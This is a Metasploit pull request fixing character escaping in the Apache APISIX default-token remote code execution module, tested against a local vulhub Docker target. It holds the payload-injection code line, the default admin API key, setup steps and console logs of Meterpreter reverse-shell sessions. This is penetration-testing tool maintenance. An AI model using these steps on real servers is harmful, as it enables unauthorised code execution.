Fix character escaping in the apisix exploit
rapid7/metasploit-framework pull request #16367
Opened 2022-03-21 19:22 UTC by zeroSteiner

While recording a demo for the APISIX RCE exploit I noticed that it wasn't working with the latest `cmd/unix/python/meterpreter/reverse_tcp` payload because it was only escaping single quotes and not backslashes. This PR fixes that issue so that both characters are properly escaped for insertion into the Lua harness.

## Verification

List the steps needed to make sure this thing works

- [ ] Setup the target
    - [ ] Git clone the vulhub repo: `git clone git@github.com:vulhub/vulhub.git` and navigate into `apisix/CVE-2020-13945`
    - [ ] Run `docker-compose up` to start the vulnerable service
- [ ] Start `msfconsole` and `use exploit/multi/http/apache_apisix_api_default_token_rce`
- [ ] Set the payload to `cmd/unix/python/meterpreter/reverse_tcp` which needs the additional characters to be escaped
- [ ] Set the RPORT to 9080 which is where docker runs it
- [ ] Run the exploit and get a session

## Example Output

```
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 192.168.159.128:9080
[+] The target appears to be vulnerable.
[*] Sending stage (39920 bytes) to 172.19.0.3
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.3:60198 ) at 2022-03-21 15:06:33 -0400

meterpreter > getuid
Server username: nobody
meterpreter > 
```

2022-03-21 22:43 UTC, gwillcox-r7 requested changes

2022-03-21 22:43 UTC, gwillcox-r7 commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    stub = "os.execute('#{payload.encoded.gsub(/(['\\])/, '\\\\\\1')}');"
Correct me if I am wrong but not that you are inside of an existing single quote, would you not need to escape the single quotes as well here to prevent issues? Same applies to the line below. Specifically speaking about the `\\\\` part.

I'm also unclear why you need so many backslashes here, mind explaining that? My other concern is considering that you may match on a `'` or a `\` here, what happens if we substitute a `\` here for `1`, which is what I presume will happen. Will that not escape the end of the string once substitution occurs?

I'd also want to question if the `;` character is needed here? Seems like this is raw Ruby code so do we need that or am I missing something?

Rest of the code looks good though 👍

2022-03-21 23:33 UTC, zeroSteiner commented on modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
> +    stub = "os.execute('#{payload.encoded.gsub(/(['\\])/, '\\\\\\1')}');"
Single quotes are still escaped, they're in the regex group. That many back slashes are needed because of Ruby. You can experiment with it using Pry to verify everything is correct for yourself.

Not sure about the semicolon but it was in the original so I left it.

2022-03-22 18:50 UTC, gwillcox-r7 commented
Before patch:

```
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > show options

Module options (exploit/multi/http/apache_apisix_api_default_token_rce):

   Name        Current Setting                   Required  Description
   ----        ---------------                   --------  -----------
   ALLOWED_IP  127.0.0.1                         yes       IP in the allowed list
   API_KEY     edd1c9f034335f136f87ad84b625c8f1  yes       Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      127.0.0.1                         yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
                                                           k/wiki/Using-Metasploit
   RPORT       9080                              yes       The target port (TCP)
   SSL         false                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /apisix                           yes       Path to the APISIX DocumentRoot
   VHOST                                         no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 127.0.0.1:9080
[+] The target appears to be vulnerable.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > exit
```

2022-03-22 18:54 UTC, gwillcox-r7 commented
Seems to be working:

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/apache_apisix_api_default_token_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set RPORT 9080
RPORT => 9080
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > show options

Module options (exploit/multi/http/apache_apisix_api_default_token_rce):

   Name        Current Setting                   Required  Description
   ----        ---------------                   --------  -----------
   ALLOWED_IP  127.0.0.1                         yes       IP in the allowed list
   API_KEY     edd1c9f034335f136f87ad84b625c8f1  yes       Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      127.0.0.1                         yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
                                                           k/wiki/Using-Metasploit
   RPORT       9080                              yes       The target port (TCP)
   SSL         false                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /apisix                           yes       Path to the APISIX DocumentRoot
   VHOST                                         no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 127.0.0.1:9080
[+] The target appears to be vulnerable.
[*] Sending stage (39920 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.20.0.3:46138 ) at 2022-03-22 13:53:25 -0500

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > id
[-] Unknown command: id
meterpreter > getuid
Server username: nobody
meterpreter > sysinfo
Computer     : d9efd0682b7d
OS           : Linux 5.15.0-23-generic #23-Ubuntu SMP Fri Mar 11 14:54:05 UTC 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > 
```

2022-03-22 19:04 UTC, merged

2022-03-22 19:05 UTC, gwillcox-r7 commented
# Release Notes
A bug was found in the way character escaping was done in `apache_apisix_api_default_token_rce` which has since been fixed. In addition, several updates have been made to better handle error cases that may occur when sending HTTP requests to the target.